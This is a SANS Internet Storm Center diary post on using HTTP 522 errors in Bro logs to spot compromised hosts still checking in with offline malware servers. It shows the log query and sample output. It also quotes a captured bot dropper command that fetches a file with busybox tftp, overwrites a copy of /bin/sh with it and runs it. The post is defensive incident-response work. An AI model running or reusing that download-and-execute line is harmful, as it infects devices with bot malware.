Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC: InfoSec Handlers Diary Blog - SANS Internet Storm Center InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
ISC Stormcast For Thursday, August 18th 2016

522 Error Code for the Win

Published: 2016-08-17
Last Updated: 2016-08-17 01:36:37 UTC
by Tom Webb (Version: 1)
2 comment(s)


Recently I ran across a tweet from Packet Watcher @jinq102030 (  to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect.    So I got our Intern to check bro logs and see what he could find. 

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"


1467159441.247406    -    522
1467160356.407366    -    522
1467161271.647320    -    522
1467163102.087490    -    522
1467164017.337316    -    522
1467164932.547084    -    522
1467182323.201685    -    522
1467183238.447046    -    522
1467184153.641505    -    522
1467185068.903194    -    522


There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis.  Out of 4GB of compressed bro logs for the day we only had about  200 total lines that matched, so very low noise ratio.

When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot . 


cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at for finding more compromised system.


Tom Webb


2 comment(s)
Diary Archives